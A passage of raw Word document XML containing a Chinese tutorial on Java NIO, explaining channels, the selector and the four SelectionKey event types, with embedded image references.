          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve"> wait,notify </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>等方式通讯。保证每次</w:t>
      </w:r>
      <w:hyperlink r:id="rId112" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00F41A4C">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="2D64B3"/>
            <w:sz w:val="15"/>
            <w:szCs w:val="15"/>
          </w:rPr>
          <w:t>上下文切换</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>都是有意义的。减少无谓的线程切换。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B1FF9" w:rsidRPr="00F41A4C" w:rsidRDefault="008B1FF9" w:rsidP="008B1FF9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F3FFEC"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="258" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="2D64B3"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5711825" cy="2087880"/>
            <wp:effectExtent l="19050" t="0" r="3175" b="0"/>
            <wp:docPr id="40" name="图片 1" descr="http://h.hiphotos.baidu.com/zhidao/wh%3D600%2C800/sign=fd1b625dd3ca7bcb7d2ecf298e39475b/42a98226cffc1e170597d7af4e90f603738de900.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId113" tgtFrame="&quot;_blank&quot;" tooltip="&quot;点击查看大图&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h.hiphotos.baidu.com/zhidao/wh%3D600%2C800/sign=fd1b625dd3ca7bcb7d2ecf298e39475b/42a98226cffc1e170597d7af4e90f603738de900.jpg">
                      <a:hlinkClick r:id="rId113" tgtFrame="&quot;_blank&quot;" tooltip="&quot;点击查看大图&quot;"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId114" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5711825" cy="2087880"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B1FF9" w:rsidRPr="00F41A4C" w:rsidRDefault="008B1FF9" w:rsidP="008B1FF9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F3FFEC"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="258" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008B1FF9" w:rsidRPr="00F41A4C" w:rsidRDefault="008B1FF9" w:rsidP="008B1FF9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F3FFEC"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="258" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Java NIO</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>的服务端只需启动一个专门的线程来处理所有的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve"> IO </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>事件，这种通信模型是怎么实现的呢？呵呵，我们一起来探究它的奥秘吧。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>j</w:t>
      </w:r>
      <w:r w:rsidRPr="00E47BEA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ava NIO</w:t>
      </w:r>
      <w:r w:rsidRPr="00E47BEA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>采用了双向通道（</w:t>
      </w:r>
      <w:r w:rsidRPr="00E47BEA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>channel</w:t>
      </w:r>
      <w:r w:rsidRPr="00E47BEA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>）进行数据传输</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>，而不是单向的流（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>stream</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>），在通道上可以注册我们感兴趣的事件。一共有以下四种事件：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B1FF9" w:rsidRPr="00F41A4C" w:rsidRDefault="008B1FF9" w:rsidP="008B1FF9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F3FFEC"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="258" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B1FF9" w:rsidRPr="00F41A4C" w:rsidRDefault="008B1FF9" w:rsidP="008B1FF9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F3FFEC"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="258" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>事件名</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>对应值</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B1FF9" w:rsidRPr="00F41A4C" w:rsidRDefault="008B1FF9" w:rsidP="008B1FF9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F3FFEC"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="258" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>服务端接收客户端连接事件</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">    SelectionKey.OP_ACCEPT(16)    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B1FF9" w:rsidRPr="00F41A4C" w:rsidRDefault="008B1FF9" w:rsidP="008B1FF9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F3FFEC"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="258" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>客户端连接服务端事件</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">    SelectionKey.OP_CONNECT(8)    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B1FF9" w:rsidRPr="00F41A4C" w:rsidRDefault="008B1FF9" w:rsidP="008B1FF9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F3FFEC"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="258" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>读事件</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">    SelectionKey.OP_READ(1)    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B1FF9" w:rsidRPr="00F41A4C" w:rsidRDefault="008B1FF9" w:rsidP="008B1FF9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F3FFEC"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="258" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>写事件</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">    SelectionKey.OP_WRITE(4)    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B1FF9" w:rsidRPr="00F41A4C" w:rsidRDefault="008B1FF9" w:rsidP="008B1FF9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F3FFEC"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="258" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B1FF9" w:rsidRPr="00F41A4C" w:rsidRDefault="008B1FF9" w:rsidP="008B1FF9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F3FFEC"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="258" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>服务端和客户端</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>各自维护一个管理通道的对象，我们称之为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>selector</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>，该对象能</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>检测一个或多个通道</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve"> (channel) </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>上的事件</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>。我们以服务端为例，如果服务端的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>selector</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>上注册了读事件，某时刻客户端给服务端发送了一些数据，阻塞</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>I/O</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>这时会调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>read()</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>方法阻塞地读取数据，而</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>NIO</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>的服务端会在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>selector</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>中添加一个读事件。服务端的处理线程会轮询地访问</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>selector</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>，如果访问</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>selector</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>时发现有感兴趣的事件到达，则处理这些事件，如果没有感兴趣的事件到达，则处理线程会一直阻塞直到感兴趣的事件到达为止。下面是我理解的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>java NIO</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>的通信模型示意图：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B1FF9" w:rsidRPr="00F41A4C" w:rsidRDefault="008B1FF9" w:rsidP="008B1FF9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F3FFEC"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="258" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008B1FF9" w:rsidRPr="00F41A4C" w:rsidRDefault="008B1FF9" w:rsidP="008B1FF9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F3FFEC"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="258" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="2D64B3"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5711825" cy="1303655"/>
            <wp:effectExtent l="19050" t="0" r="3175" b="0"/>
            <wp:docPr id="39" name="图片 2" descr="http://a.hiphotos.baidu.com/zhidao/wh%3D600%2C800/sign=a0253cedfff2b211e47b8d48fab04900/1c950a7b02087bf4bacc0d77f6d3572c11dfcf08.jpg">
